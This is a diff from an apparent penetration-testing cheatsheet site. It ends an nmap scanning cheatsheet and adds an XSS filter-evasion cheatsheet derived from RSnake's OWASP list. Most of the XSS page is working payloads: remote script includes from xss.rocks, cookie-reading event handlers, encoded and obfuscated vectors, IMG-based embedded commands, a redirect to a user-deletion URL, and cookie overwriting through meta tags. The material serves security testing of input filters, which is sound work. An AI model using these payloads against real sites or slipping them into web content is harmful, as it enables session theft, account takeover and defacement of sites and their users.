Output Switch Description Example -oN nmap 192.168.1.1 -oN normal.file Normal output to the file normal.file -oX nmap 192.168.1.1 -oX xml.file XML output to the file xml.file -oG nmap 192.168.1.1 -oG grep.file Grepable output to the file grep.file -oA nmap 192.168.1.1 -oA results Output in the three major formats at once -oG - nmap 192.168.1.1 -oG - Grepable output to screen. -oN -, -oX - also usable --append-output nmap 192.168.1.1 -oN file.file --append-output Append a scan to a previous scan file -v nmap 192.168.1.1 -v Increase the verbosity level (use -vv or more for greater effect) -d nmap 192.168.1.1 -d Increase debugging level (use -dd or more for greater effect) --reason nmap 192.168.1.1 --reason Display the reason a port is in a particular state, same output as -vv --open nmap 192.168.1.1 --open Only show open (or possibly open) ports --packet-trace nmap 192.168.1.1 -T4 --packet-trace Show all packets sent and received --iflist nmap --iflist Shows the host interfaces and routes --resume nmap --resume results.file Resume a scan
Helpful Nmap Output examples Scan for web servers and grep to show which IPs are running web servers
nmap -p80 -sV -oG - --open 192 .168.1.1/24 | grep open
+
Generate a list of the IPs of live hosts
nmap -iR 10 -n -oX out.xml | grep "Nmap" | cut -d " " -f5 > live-hosts.txt
+
Append IP to the list of live hosts
nmap -iR 10 -n -oX out2.xml | grep "Nmap" | cut -d " " -f5 >> live-hosts.txt
+
Compare output from nmap using the ndif
ndiff scanl.xml scan2.xml
+
Convert nmap xml files to html files
xsltproc nmap.xml -o nmap.html
+
Reverse sorted list of how often ports turn up
grep " open " results.nmap | sed -r 's/ +/ /g' | sort | uniq -c | sort -rn | less
+
Miscellaneous Options Switch Description Example -6 nmap -6 2607:f0d0:1002:51::4 Enable IPv6 scanning -h nmap -h nmap help screen
Other Useful Nmap Commands Discovery only on ports x, no port scan
nmap -iR 10 -PS22-25,80,113,1050,35000 -v -sn
+
Arp discovery only on local network, no port scan
nmap 192 .168.1.1-1/24 -PR -sn -vv
+
Traceroute to random targets, no port scan
nmap -iR 10 -sn -traceroute
+
Query the Internal DNS for hosts, list targets only
nmap 192 .168.1.1-50 -sL --dns-server 192 .168.1.1
+
Back to top
\ No newline at end of file
diff --git a/penetration-testing/cheatsheets/xss-cheatsheet/index.html b/penetration-testing/cheatsheets/xss-cheatsheet/index.html
new file mode 100644
index 000000000..c2c8ba6ba
--- /dev/null
+++ b/penetration-testing/cheatsheets/xss-cheatsheet/index.html
@@ -0,0 +1,372 @@
+ XSS CheatSheet - 3os penetration-testing tools cheatsheet Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-05 XSS CheatSheet Introduction This article is focused on providing application security testing professionals with a guide to assist in Cross Site Scripting testing. The initial contents of this article were donated to OWASP by RSnake, from his seminal XSS CheatSheet, which was at: http://ha.ckers.org/xss.html
. That site now redirects to its new home here, where we plan to maintain and enhance it. The very first OWASP Prevention CheatSheet, the Cross Site Scripting Prevention CheatSheet , was inspired by RSnake's XSS CheatSheet, so we can thank RSnake for our inspiration. We wanted to create short, simple guidelines that developers could follow to prevent XSS, rather than simply telling developers to build apps that could protect against all the fancy tricks specified in rather complex attack CheatSheet, and so the OWASP CheatSheet Series was born.
This CheatSheet lists a series of XSS attacks that can be used to bypass certain XSS defensive filters. Please note that input filtering is an incomplete defense for XSS which these tests can be used to illustrate.
Basic XSS Test Without Filter Evasion This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):
< SCRIPT SRC = http://xss.rocks/xss.js ></ SCRIPT >
+
XSS Locator (Polygot) The following is a "polygot test XSS payload." This test will execute in multiple contexts including html, script string, js and url. Thank you to Gareth Heyes for this contribution .
`javascript:/*--></ title ></ style ></ textarea ></ script ></ xmp >< svg / onload = '+/"/+/onmouseover=1/+/[*/[]/+alert(1)//' >
+
Image XSS Using the JavaScript Directive Image XSS using the JavaScript directive (IE7.0 doesn't support the JavaScript directive in context of an image, but it does in other contexts, but the following show the principles that would work in other tags as well:
< img src = "javascript:alert('XSS');" />
+
No Quotes and no Semicolon < IMG SRC = javascript:alert('XSS') >
+
Case Insensitive XSS Attack Vector < IMG SRC = JaVaScRiPt:alert('XSS') >
+
HTML Entities The semicolons are required for this to work:
< img src = 'javascript:alert("XSS")' />
+
Grave Accent Obfuscation If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents:
< IMG SRC = `javascript:alert("RSnake says , ' XSS '")` >
+
Skip the HREF attribute and get to the meat of the XXS... Submitted by David Cross ~ Verified on Chrome
`\< a onmouseover = "alert(document.cookie)" \ > xxs link\< /a\>
+
or Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.
`\< a onmouseover = alert(document.cookie)\ > xxs link\< /a\>
+
Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tags:
< IMG """ >
+< script >
+ alert ( 'XSS' );
+</ script >
+"\>
+
fromCharCode If no quotes of any kind are allowed you can eval()
a fromCharCode
in JavaScript to create any XSS vector you need:
< img src = "javascript:alert(String.fromCharCode(88,83,83))" />
+
Default SRC Tag to Get Past Filters that Check SRC Domain This will bypass most SRC domain filters. Inserting javascript in an event method will also apply to any HTML tag type injection that uses elements like Form, Iframe, Input, Embed etc. It will also allow any relevant event for the tag type to be substituted like onblur
, onclick
giving you an extensive amount of variations for many injections listed here. Submitted by David Cross .
< img src = "#" onmouseover = "alert('xxs')" />
+
Default SRC Tag by Leaving it Empty < img src = "onmouseover" =" alert (' xxs ')" />
+
Default SRC Tag by Leaving it out Entirely < img onmouseover = "alert('xxs')" />
+
On Error Alert < IMG SRC = / onerror = "alert(String.fromCharCode(88,83,83))" ></ img >
+
IMG onerror and JavaScript Alert Encode < img src = x onerror = "javascript:alert('XSS')" >
+
Decimal HTML Character References All of the XSS examples that use a javascript: directive inside of an <IMG
tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode).
< img
+ src = "javascript:alert('XSS')"
+/>
+
Decimal HTML Character References Without Trailing Semicolons This is often effective in XSS that attempts to look for "&#XX;", since most people don't know about padding - up to 7 numeric characters total. This is also useful against people who decode against strings like \(tmp_string =\~ s/.\*\\&\#(\\d+);.\*/\) 1/; which incorrectly assumes a semicolon is required to terminate a html encoded string (I've seen this in the wild):
< img
+ src = "javascript:alert('XSS')"
+/>
+
Hexadecimal HTML Character References Without Trailing Semicolons This is also a viable XSS attack against the above string \(tmp_string=\~ s/.\*\\&\#(\\d+);.\*/\) 1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters).
< img
+ src = "javascript:alert('XSS')"
+/>
+
Embedded Tab Used to break up the cross site scripting attack:
< img src = "jav ascript:alert('XSS');" />
+
Embedded Encoded Tab Use this one to break up XSS :
< img src = "jav	ascript:alert('XSS');" />
+
Embedded Newline to Break-up XSS Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ascii chart for more details. The following four XSS examples illustrate this vector:
< img src = "jav
ascript:alert('XSS');" />
+
Embedded Carriage Return to Break-up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):
< img src = "jav
ascript:alert('XSS');" />
+
Null breaks up JavaScript Directive Null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy or use %00
in the URL string or if you want to write your own injection tool you can either use vim (^V^@
will produce a null) or the following program to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hypen control char). But the null char %00
is much more useful and helped me bypass certain real world filters with a variation on this example:
`perl -e 'print "< IMG SRC = java\0script:alert(\"XSS\") > ";' > out`
+
This is useful if the pattern match doesn't take into account spaces in the word javascript:
-which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the javascript:
keyword. The actual reality is you can have any char from 1-32 in decimal:
< img src = "  javascript:alert('XSS');" />
+
Non-alpha-non-digit XSS The Firefox HTML parser assumes a non-alpha-non-digit is not valid after an HTML keyword and therefor considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example \<SCRIPT\\s
!= \<SCRIPT/XSS\\s
:
< SCRIPT / XSS SRC = "http://xss.rocks/xss.js" ></ SCRIPT >
+
Based on the same idea as above, however,expanded on it, using Rnake fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this also applies to the grave accent char as seen here:
< BODY onload !#$%&()*~+ -_ ., : ;?@[/|\]^`= alert (" XSS ") >
+
Yair Amit brought this to my attention that there is slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the parameter with no spaces. This could be useful if the system does not allow spaces.
< SCRIPT / SRC = "http://xss.rocks/xss.js" ></ SCRIPT >
+
Submitted by Franz Sedlmaier, this XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error:
<
+< script >
+ alert ( 'XSS' ); //\<
+</ script >
+
In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the \></SCRIPT>
portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't effect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally, although beware, I have no idea what the HTML will end up looking like once this is injected:
< SCRIPT SRC = http://xss.rocks/xss.js?< B >
+
This particular variant was submitted by Åukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT>
tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.
< SCRIPT SRC = //xss.rocks/.j >
+
Half Open HTML/JavaScript XSS Vector Unlike Firefox the IE rendering engine doesn't add extra data to you page, but it does allow the javascript: directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes there is any HTML tag below where you are injecting this cross site scripting vector. Even though there is no close ">" tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. It gets around the following NIDS regex: /((\\%3D)|(=))\[^\\n\]\*((\\%3C)|\<)\[^\\n\]+((\\%3E)|\>)/
because it doesn't require the end ">". As a side note, this was also affective against a real world XSS filter I came across using an open ended <IFRAME
tag instead of an <IMG
tag:
< IMG SRC = "`<javascript:alert>`('XSS')" `
+
Double Open Angle Brackets Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't:
< iframe src = http://xss.rocks/scriptlet.html <`
+
Escaping JavaScript Escapes When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a="$ENV{QUERY\_STRING}";</SCRIPT>
and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this gets injected it will read <SCRIPT>var a="\\\\";alert('XSS');//";</SCRIPT>
which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. The XSS locator uses this method.:
An alternative, if correct JSON or Javascript escaping has been applied to the embedded data but not HTML encoding, is to finish the script block and start your own:
</ script >< script > alert ( 'XSS' );</ script >
+
End Title Tag This is a simple XSS vector that closes <TITLE>
tags, which can encapsulate the malicious cross site scripting attack:
</ TITLE >< SCRIPT > alert ( "XSS" );</ SCRIPT >
+
< input type = "IMAGE" src = "javascript:alert('XSS');" />
+
BODY Image < body background = "javascript:alert('XSS')" ></ body >
+
IMG Dynsrc < img DYNSRC = "javascript:alert('XSS')" />
+
IMG Lowsrc < img LOWSRC = "javascript:alert('XSS')" />
+
List-style-image Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector:
< STYLE > li { list-style-image : url ( "javascript:alert('XSS')" );}</ STYLE >< UL >< LI > XSS</ br >
+
VBscript in an Image < img src = 'vbscript:msgbox("XSS")' />
+
Livescript (older versions of Netscape only) < img src = "livescript:[code]" />
+
SVG Object Tag < svg / onload = alert('XSS') >
+
ECMAScript 6 Set.constructor`alert\x28document.domain\x29
+
BODY Tag Method doesn't require using any variants of javascript:
or <SCRIPT...
to accomplish the XSS attack). Dan Crowley additionally noted that you can put a space before the equals sign (onload=
!= onload =
):
< BODY ONLOAD = alert('XSS') >
+
Event Handlers It can be used in similar XSS attacks to the one above (this is the most comprehensive list on the net, at the time of this writing). Thanks to Rene Ledosquet for the HTML+TIME updates.
FSCommand()
(attacker can use this when executed from within an embedded Flash object) onAbort()
(when user aborts the loading of an image) onActivate()
(when object is set as the active element) onAfterPrint()
(activates after user prints or previews print job) onAfterUpdate()
(activates on data object after updating data in the source object) onBeforeActivate()
(fires before the object is set as the active element) onBeforeCopy()
(attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand("Copy")
function) onBeforeCut()
(attacker executes the attack string right before a selection is cut) onBeforeDeactivate()
(fires right after the activeElement is changed from the current object) onBeforeEditFocus()
(Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected) onBeforePaste()
(user needs to be tricked into pasting or be forced into it using the execCommand("Paste")
function) onBeforePrint()
(user would need to be tricked into printing or attacker could use the print()
or execCommand("Print")
function). onBeforeUnload()
(user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent) onBeforeUpdate()
(activates on data object before updating data in the source object) onBegin()
(the onbegin event fires immediately when the element's timeline begins) onBlur()
(in the case where another popup is loaded and window looses focus) onBounce()
(fires when the behavior property of the marquee object is set to "alternate" and the contents of the marquee reach one side of the window) onCellChange()
(fires when data changes in the data provider) onChange()
(select, text, or TEXTAREA field loses focus and its value has been modified) onClick()
(someone clicks on a form) onContextMenu()
(user would need to right click on attack area) onControlSelect()
(fires when the user is about to make a control selection of the object) onCopy()
(user needs to copy something or it can be exploited using the execCommand("Copy")
command) onCut()
(user needs to copy something or it can be exploited using the execCommand("Cut")
command) onDataAvailable()
(user would need to change data in an element, or attacker could perform the same function) onDataSetChanged()
(fires when the data set exposed by a data source object changes) onDataSetComplete()
(fires to indicate that all data is available from the data source object) onDblClick()
(user double-clicks a form element or a link) onDeactivate()
(fires when the activeElement is changed from the current object to another object in the parent document) onDrag()
(requires that the user drags an object) onDragEnd()
(requires that the user drags an object) onDragLeave()
(requires that the user drags an object off a valid location) onDragEnter()
(requires that the user drags an object into a valid location) onDragOver()
(requires that the user drags an object into a valid location) onDragDrop()
(user drops an object (e.g. file) onto the browser window) onDragStart()
(occurs when user starts drag operation) onDrop()
(user drops an object (e.g. file) onto the browser window) onEnd()
(the onEnd event fires when the timeline ends. onError()
(loading of a document or image causes an error) onErrorUpdate()
(fires on a databound object when an error occurs while updating the associated data in the data source object) onFilterChange()
(fires when a visual filter completes state change) onFinish()
(attacker can create the exploit when marquee is finished looping) onFocus()
(attacker executes the attack string when the window gets focus) onFocusIn()
(attacker executes the attack string when window gets focus) onFocusOut()
(attacker executes the attack string when window looses focus) onHashChange()
(fires when the fragment identifier part of the document's current address changed) onHelp()
(attacker executes the attack string when users hits F1 while the window is in focus) onInput()
(the text content of an element is changed through the user interface) onKeyDown()
(user depresses a key) onKeyPress()
(user presses or holds down a key) onKeyUp()
(user releases a key) onLayoutComplete()
(user would have to print or print preview) onLoad()
(attacker executes the attack string after the window loads) onLoseCapture()
(can be exploited by the releaseCapture()
method) onMediaComplete()
(When a streaming media file is used, this event could fire before the file starts playing) onMediaError()
(User opens a page in the browser that contains a media file, and the event fires when there is a problem) onMessage()
(fire when the document received a message) onMouseDown()
(the attacker would need to get the user to click on an image) onMouseEnter()
(cursor moves over an object or area) onMouseLeave()
(the attacker would need to get the user to mouse over an image or table and then off again) onMouseMove()
(the attacker would need to get the user to mouse over an image or table) onMouseOut()
(the attacker would need to get the user to mouse over an image or table and then off again) onMouseOver()
(cursor moves over an object or area) onMouseUp()
(the attacker would need to get the user to click on an image) onMouseWheel()
(the attacker would need to get the user to use their mouse wheel) onMove()
(user or attacker would move the page) onMoveEnd()
(user or attacker would move the page) onMoveStart()
(user or attacker would move the page) onOffline()
(occurs if the browser is working in online mode and it starts to work offline) onOnline()
(occurs if the browser is working in offline mode and it starts to work online) onOutOfSync()
(interrupt the element's ability to play its media as defined by the timeline) onPaste()
(user would need to paste or attacker could use the execCommand("Paste")
function) onPause()
(the onpause event fires on every element that is active when the timeline pauses, including the body element) onPopState()
(fires when user navigated the session history) onProgress()
(attacker would use this as a flash movie was loading) onPropertyChange()
(user or attacker would need to change an element property) onReadyStateChange()
(user or attacker would need to change an element property) onRedo()
(user went forward in undo transaction history) onRepeat()
(the event fires once for each repetition of the timeline, excluding the first full cycle) onReset()
(user or attacker resets a form) onResize()
(user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>
) onResizeEnd()
(user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>
) onResizeStart()
(user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>
) onResume()
(the onresume event fires on every element that becomes active when the timeline resumes, including the body element) onReverse()
(if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward) onRowsEnter()
(user or attacker would need to change a row in a data source) onRowExit()
(user or attacker would need to change a row in a data source) onRowDelete()
(user or attacker would need to delete a row in a data source) onRowInserted()
(user or attacker would need to insert a row in a data source) onScroll()
(user would need to scroll, or attacker could use the scrollBy()
function) onSeek()
(the onreverse event fires when the timeline is set to play in any direction other than forward) onSelect()
(user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");
) onSelectionChange()
(user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");
) onSelectStart()
(user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");
) onStart()
(fires at the beginning of each marquee loop) onStop()
(user would need to press the stop button or leave the webpage) onStorage()
(storage area changed) onSyncRestored()
(user interrupts the element's ability to play its media as defined by the timeline to fire) onSubmit()
(requires attacker or user submits a form) onTimeError()
(user or attacker sets a time property, such as dur, to an invalid value) onTrackChange()
(user or attacker changes track in a playList) onUndo()
(user went backward in undo transaction history) onUnload()
(as the user clicks any link or presses the back button or attacker forces a click) onURLFlip()
(this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file) seekSegmentTime()
(this is a method that locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.) BGSOUND < bgsound SRC = "javascript:alert('XSS');" ></ bgsound >
+
& JavaScript includes < br SIZE = "&{alert('XSS')}" />
+
STYLE sheet < link rel = "stylesheet" href = "javascript:alert('XSS');" />
+
Remote style sheet Using something as simple as a remote style sheet you can include your XSS as the style parameter can be redefined using an embedded expression. This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page:
< link rel = "stylesheet" href = "http://xss.rocks/xss.css" />
+
Remote style sheet part 2 This works the same as above, but uses a <STYLE>
tag instead of a <LINK>
tag). A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end </STYLE>
tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world:
< style >
+ @ import 'http://xss.rocks/xss.css' ;
+</ style >
+
Remote style sheet part 3 This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to RFC2616 setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://xss.rocks/xss.css>; REL=stylesheet
) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox:
< meta http-equiv = "Link" content = "<http://xss.rocks/xss.css>; REL=stylesheet" />
+
Remote style sheet part 4 This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefor is vulnerable to this for the vast majority of sites:
< style >
+ BODY {
+ -moz- binding : url ( 'http://xss.rocks/xssmoz.xml#xss' );
+ }
+</ style >
+
This XSS at times sends IE into an infinite loop of alerts:
< style >
+ @ im \ port '\ja\vasc\ript:alert("XSS")' ;
+</ style >
+
Created by Roman Ivanov
< img style = "xss:expr/*XSS*/ession(alert('XSS'))" />
+
IMG STYLE with Expression This is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop:
exp/*< a
+ style = 'no\xss:noxss("*//*");
+xss:ex/*XSS*//*/*/pression(alert("XSS"))'
+></ a >
+
STYLE Tag (Older versions of Netscape only) < style type = "text/javascript" >
+ alert ( 'XSS' );
+</ style >
+
STYLE Tag using Background-image < style >
+ . XSS {
+ background-image : url ( "javascript:alert('XSS')" );
+ }</ style
+>< a class = "XSS" ></ a >
+
STYLE Tag using Background < style type = "text/css" >
+ BODY {
+ background : url ( "javascript:alert('XSS')" );
+ }</ style
+> ` `< style type = "text/css" >
+ BODY {
+ background : url ( "<javascript:alert>('XSS')" );
+ }
+</ style >
+
Anonymous HTML with STYLE Attribute IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter:
< XSS STYLE = "xss:expression(alert('XSS'))" ></ XSS >
+
Local htc File This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute:
< XSS STYLE = "behavior: url(xss.htc);" ></ XSS >
+
US-ASCII Encoding US-ASCII encoding (found by Kurt Huwig).This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.
`¼script¾alert(¢XSS¢)¼/script¾`
+
The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs:
< meta http-equiv = "refresh" content = "0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" />
+
IFRAME If iframes are allowed there are a lot of other XSS problems as well:
< iframe src = "javascript:alert('XSS');" ></ iframe >
+
IFRAME Event Based IFrames and most other elements can use event based mayhem like the following... (Submitted by: David Cross)
< iframe src = "#" onmouseover = "alert(document.cookie)" ></ iframe >
+
FRAME Frames have the same sorts of XSS problems as iframes
< FRAMESET >< FRAME SRC = "javascript:alert('XSS');" ></ FRAMESET >
+
TABLE < table BACKGROUND = "javascript:alert('XSS')" ></ table >
+
TD Just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors:
< table >
+ < td BACKGROUND = "javascript:alert('XSS')" ></ td >
+</ table >
+
DIV DIV Background-image < div style = "background-image: url(javascript:alert('XSS'))" ></ div >
+
DIV Background-image with Unicoded XSS Exploit This has been modified slightly to obfuscate the url parameter. The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail:
< div
+ style = "background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"
+></ div >
+
Rnaske built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279):
< div style = "background-image: url(javascript:alert('XSS'))" ></ div >
+
DIV Expression A variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression":
< div style = "width: expression(alert('XSS'));" ></ div >
+
Downlevel-Hidden Block Only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job:
<!--[if gte IE 4]>
+ <script>
+ alert('XSS');
+ </script>
+<![endif]-->
+
BASE Tag Works in IE and Netscape 8.1 in safe mode. You need the //
to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like images/image.jpg
rather than full paths. If the path includes a leading forward slash like /images/image.jpg
you can remove one slash from this vector (as long as there are two to begin the comment this will work):
< base href = "javascript:alert('XSS');//" />
+
OBJECT Tag If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag). The linked file is actually an HTML file that can contain your XSS:
< object type = "text/x-scriptlet" data = "http://xss.rocks/scriptlet.html" ></ object >
+
EMBED SVG Which Contains XSS Vector This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to nEUrOO for this one.
< EMBED SRC = "data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type = "image/svg+xml" AllowScriptAccess = "always" ></ EMBED >
+
Using ActionScript Inside Flash for Obfuscation a = 'get' ;
+b = 'URL("' ;
+c = 'javascript:' ;
+d = "alert('XSS');\")" ;
+eval ( a + b + c + d );
+
XML Data Island with CDATA Obfuscation This XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode) - vector found by Sec Consult while auditing Yahoo:
<XML ID= "xss" ><I><B><IMG SRC= "javas<!-- -->cript:alert('XSS')" ></B></I></XML>
+<SPAN DATASRC= "#xss" DATAFLD= "B" DATAFORMATAS= "HTML" ></SPAN>
+
Locally hosted XML with embedded JavaScript that is generated using an XML data island This is the same as above but instead referrs to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result here:
<XML SRC= "xsstest.xml" ID= I ></XML>
+<SPAN DATASRC= #I DATAFLD= C DATAFORMATAS= HTML ></SPAN>
+
HTML+TIME in XML This is how Grey Magic hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work:
< html >
+ < body >
+ < ?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
+ < ?import namespace="t" implementation="#default#time2">
+ < t:set attributeName = "innerHTML" to = "XSS
+ <script defer>
+ alert('XSS');
+ </script>
+ " >
+ </ body >
+</ html >
+
Assuming you can only fit in a few characters and it filters against .js
You can rename your JavaScript file to an image as an XSS vector:
< script src = "http://xss.rocks/xss.jpg" ></ script >
+
SSI (Server Side Includes) This requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues:
<!-- # exec cmd = "/bin/echo '<SCR'" --> <!-- # exec cmd = "/bin/echo 'IPT SRC=http://xss.rocks/xss.js></SCRIPT>'" -->
+
PHP Requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues:
<? echo ( '<SCR)' ;
+echo ( 'IPT>alert("XSS")</SCRIPT>' ); ?>
+
IMG Embedded Commands This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors:
< img src = "http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" />
+
IMG Embedded Commands part II This is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC="httx://badguy.com/a.jpg">
could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this):
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
Cookie Manipulation Admittedly this is pretty obscure but I have seen a few examples where <META
is allowed and you can use it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc...):
< meta http-equiv = "Set-Cookie" content = "USERID=<SCRIPT>alert('XSS')</SCRIPT>" />
+
UTF-7 Encoding If the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov for this one). Click here for an example (you don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode). This does not work in any modern browser without changing the encoding type which is why it is marked as completely unsupported. Watchfire found this hole in Google's custom 404 script.:
< head >
+ < meta http-equiv = "CONTENT-TYPE" content = "text/html; charset=UTF-7" /></ head
+> +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-`
+
